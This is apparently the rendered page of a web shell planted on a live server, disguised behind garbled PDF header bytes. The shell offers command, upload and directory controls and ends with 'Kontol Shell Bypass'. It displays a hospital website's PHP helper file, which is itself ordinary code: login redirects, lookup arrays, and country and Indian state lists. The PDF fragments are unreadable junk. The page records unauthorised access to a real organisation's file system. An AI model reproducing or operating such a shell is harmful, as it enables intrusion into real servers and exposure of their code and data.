%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/application/helpers/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/application/helpers/func_helper.php
<?php 

/** Logged Auth **/

function logged_data() {

	return get_session(USR_SESSION_NAME);

}



function logged_admin_data() {

	return get_session(ADM_SESSION_NAME);

}



function redirect_logged() {

	if(isLogged()){ 

		redirect(URL.'acc/profile');

	}

}



function redirect_admin_logged() {

	if(logged_admin_data()){

		redirect(ADM_URL.'dashboard');

	}

}



function redirect_not_logged() {

	if(!logged_data())

		redirect(URL);

}



function redirect_admin_not_logged() {

	if(!logged_admin_data())

		redirect(ADM_URL);

}

/** Logged Auth End **/





function add_jquery_ui(){

	echo '<link href="'.AURL.'plugins/jquery-ui/jquery-ui-1.10.3.custom.min.css" rel="stylesheet" type="text/css"/>';

	echo '<link href="'.AURL.'css/jq_ui.css" rel="stylesheet" type="text/css"/>';

	echo '<script src="'.AURL.'plugins/jquery-ui/jquery-ui-1.10.3.custom.min.js" type="text/javascript"></script>';

}



/** Lookups **/ 

function status_lookup($k='') {

	$a=array('A'=>'Active', 'I'=>'Inactive');

	if($k!=='') {return $a[$k];}

	return $a;

}



function approval_lookup($k='') {

	$a=array('Y'=>'Approved', 'N'=>'Not Approved');

	if($k!=='') {return $a[$k];}

	return $a;

}

/** **/


function countries(){

	$countries = array("Afghanistan", "Albania", "Algeria", "American Samoa", "Andorra", "Angola", "Anguilla", "Antarctica", "Antigua and Barbuda", "Argentina", "Armenia", "Aruba", "Australia", "Austria", "Azerbaijan", "Bahamas", "Bahrain", "Bangladesh", "Barbados", "Belarus", "Belgium", "Belize", "Benin", "Bermuda", "Bhutan", "Bolivia", "Bosnia and Herzegowina", "Botswana", "Bouvet Island", "Brazil", "British Indian Ocean Territory", "Brunei Darussalam", "Bulgaria", "Burkina Faso", "Burundi", "Cambodia", "Cameroon", "Canada", "Cape Verde", "Cayman Islands", "Central African Republic", "Chad", "Chile", "China", "Christmas Island", "Cocos (Keeling) Islands", "Colombia", "Comoros", "Congo", "Congo, the Democratic Republic of the", "Cook Islands", "Costa Rica", "Cote d'Ivoire", "Croatia (Hrvatska)", "Cuba", "Cyprus", "Czech Republic", "Denmark", "Djibouti", "Dominica", "Dominican Republic", "East Timor", "Ecuador", "Egypt", "El Salvador", "Equatorial Guinea", "Eritrea", "Estonia", "Ethiopia", "Falkland Islands (Malvinas)", "Faroe Islands", "Fiji", "Finland", "France", "France Metropolitan", "French Guiana", "French Polynesia", "French Southern Territories", "Gabon", "Gambia", "Georgia", "Germany", "Ghana", "Gibraltar", "Greece", "Greenland", "Grenada", "Guadeloupe", "Guam", "Guatemala", "Guinea", "Guinea-Bissau", "Guyana", "Haiti", "Heard and Mc Donald Islands", "Holy See (Vatican City State)", "Honduras", "Hong Kong", "Hungary", "Iceland", "India", "Indonesia", "Iran (Islamic Republic of)", "Iraq", "Ireland", "Israel", "Italy", "Jamaica", "Japan", "Jordan", "Kazakhstan", "Kenya", "Kiribati", "Korea, Democratic People's Republic of", "Korea, Republic of", "Kuwait", "Kyrgyzstan", "Lao, People's Democratic Republic", "Latvia", "Lebanon", "Lesotho", "Liberia", "Libyan Arab Jamahiriya", "Liechtenstein", "Lithuania", "Luxembourg", "Macau", "Macedonia, The Former Yugoslav Republic of", "Madagascar", "Malawi", "Malaysia", "Maldives", "Mali", "Malta", "Marshall Islands", "Martinique", "Mauritania", "Mauritius", "Mayotte", "Mexico", "Micronesia, Federated States of", "Moldova, Republic of", "Monaco", "Mongolia", "Montserrat", "Morocco", "Mozambique", "Myanmar", "Namibia", "Nauru", "Nepal", "Netherlands", "Netherlands Antilles", "New Caledonia", "New Zealand", "Nicaragua", "Niger", "Nigeria", "Niue", "Norfolk Island", "Northern Mariana Islands", "Norway", "Oman", "Pakistan", "Palau", "Panama", "Papua New Guinea", "Paraguay", "Peru", "Philippines", "Pitcairn", "Poland", "Portugal", "Puerto Rico", "Qatar", "Reunion", "Romania", "Russian Federation", "Rwanda", "Saint Kitts and Nevis", "Saint Lucia", "Saint Vincent and the Grenadines", "Samoa", "San Marino", "Sao Tome and Principe", "Saudi Arabia", "Senegal", "Seychelles", "Sierra Leone", "Singapore", "Slovakia (Slovak Republic)", "Slovenia", "Solomon Islands", "Somalia", "South Africa", "South Georgia and the South Sandwich Islands", "Spain", "Sri Lanka", "St. Helena", "St. Pierre and Miquelon", "Sudan", "Suriname", "Svalbard and Jan Mayen Islands", "Swaziland", "Sweden", "Switzerland", "Syrian Arab Republic", "Taiwan, Province of China", "Tajikistan", "Tanzania, United Republic of", "Thailand", "Togo", "Tokelau", "Tonga", "Trinidad and Tobago", "Tunisia", "Turkey", "Turkmenistan", "Turks and Caicos Islands", "Tuvalu", "Uganda", "Ukraine", "United Arab Emirates", "United Kingdom", "United States", "United States Minor Outlying Islands", "Uruguay", "Uzbekistan", "Vanuatu", "Venezuela", "Vietnam", "Virgin Islands (British)", "Virgin Islands (U.S.)", "Wallis and Futuna Islands", "Western Sahara", "Yemen", "Yugoslavia", "Zambia", "Zimbabwe");

	

	$c=array();

	foreach($countries as $a){

		$c[$a]=$a;

	}

	return $c;

}


function states(){

	$indian_all_states  = array (

		 'AP' => 'Andhra Pradesh',

		 'AR' => 'Arunachal Pradesh',

		 'AS' => 'Assam',

		 'BR' => 'Bihar',

		 'CT' => 'Chhattisgarh',

		 'GA' => 'Goa',

		 'GJ' => 'Gujarat',

		 'HR' => 'Haryana',

		 'HP' => 'Himachal Pradesh',

		 'JK' => 'Jammu & Kashmir',

		 'JH' => 'Jharkhand',

		 'KA' => 'Karnataka',

		 'KL' => 'Kerala',

		 'MP' => 'Madhya Pradesh',

		 'MH' => 'Maharashtra',

		 'MN' => 'Manipur',

		 'ML' => 'Meghalaya',

		 'MZ' => 'Mizoram',

		 'NL' => 'Nagaland',

		 'OR' => 'Odisha',

		 'PB' => 'Punjab',

		 'RJ' => 'Rajasthan',

		 'SK' => 'Sikkim',

		 'TN' => 'Tamil Nadu',

		 'TR' => 'Tripura',

		 'UK' => 'Uttarakhand',

		 'UP' => 'Uttar Pradesh',

		 'WB' => 'West Bengal',

		 'AN' => 'Andaman & Nicobar',

		 'CH' => 'Chandigarh',

		 'DN' => 'Dadra and Nagar Haveli',

		 'DD' => 'Daman & Diu',

		 'DL' => 'Delhi',

		 'LD' => 'Lakshadweep',

		 'PY' => 'Puducherry',

		);

		

	$states=array();

	foreach($indian_all_states as $s){

		$states[$s]=$s;

	}

	

	return $states;

}



//End of file

Kontol Shell Bypass